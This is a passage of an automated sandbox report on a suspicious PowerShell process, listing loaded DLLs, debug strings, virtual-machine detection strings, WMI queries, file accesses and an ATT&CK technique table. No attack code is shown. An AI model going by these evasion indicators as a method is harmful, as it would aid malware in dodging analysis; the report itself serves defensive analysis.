Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
Source: Binary string: softy.pdb source: powershell.exe, 00000000.00000002.2756104148.0000029A3FE5B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.2753750135.0000029A3FA4F000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2753750135.0000029A3FB29000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000000.00000002.2753750135.0000029A3FB86000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000000.00000002.2756104148.0000029A3FE5B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdbCLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 00000000.00000002.2753750135.0000029A3FB29000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000000.00000002.2756104148.0000029A3FE5B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\mscorlib.pdb source: powershell.exe, 00000000.00000002.2753750135.0000029A3FA8A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000000.00000002.2753750135.0000029A3FB29000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\mscorlib.pdb}a source: powershell.exe, 00000000.00000002.2753750135.0000029A3FA8A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.2753750135.0000029A3FA6E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.2753750135.0000029A3FA6E000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FF88BA0D2A5 pushad ; iretd 0_2_00007FF88BA0D2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FF88BB22315 pushad ; iretd 0_2_00007FF88BB2232D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FF88BB200BD pushad ; iretd 0_2_00007FF88BB200C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FF88BDA9664 push ebp; retf 0_2_00007FF88BDA966C
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FF88BDD28E0 push eax; ret 0_2_00007FF88BDD28E1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FF88BDD2AA8 push eax; ret 0_2_00007FF88BDD2AA9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FF88BDD29FF push eax; ret 0_2_00007FF88BDD2A00
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FF88BDD720C push cs; retf 0_2_00007FF88BDD720F

Hooking and other Techniques for Hiding and Protection

barindex
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion

barindex
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_CacheMemory
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_VideoController
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9846Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
Source: powershell.exe, 00000000.00000002.2753750135.0000029A3FBB6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: IsVirtualMachineMSFT_MpComputerStatusMSFT_MpComputerStatus
Source: powershell.exe, 00000000.00000002.2748167521.0000029A37B60000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: <!-- IFRpbWUtU3RhbXAgUENBIDIwMTAwDQYJKoZIhvcNAQEFBQACBQDk2nlVMCIYDzIw -->
Source: powershell.exe, 00000000.00000002.2753750135.0000029A3FBB6000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2722514159.0000029A25588000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: IsVirtualMachine
Source: powershell.exe, 00000000.00000002.2724001546.0000029A284AD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: IsVirtualMachine(L
Source: powershell.exe, 00000000.00000002.2753750135.0000029A3FBB6000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2722514159.0000029A25588000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: booleanIsVirtualMachine
Source: powershell.exe, 00000000.00000002.2755807793.0000029A3FBD7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMCIYDzIw --IK9z!9
Source: powershell.exe, 00000000.00000002.2724001546.0000029A284AD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware(L
Source: powershell.exe, 00000000.00000002.2724001546.0000029A284AD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware8
Source: powershell.exe, 00000000.00000002.2756104148.0000029A3FE50000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.746.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
Windows Management Instrumentation
1
DLL Side-Loading
1
Process Injection
1
Virtualization/Sandbox Evasion
OS Credential Dumping21
Security Software Discovery
Remote Services1
Archive Collected Data
1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts1
PowerShell
Boot or Logon Initialization Scripts1
DLL Side-Loading
1
Process Injection
LSASS Memory1
Virtualization/Sandbox Evasion
Remote Desktop ProtocolData from Removable Media1
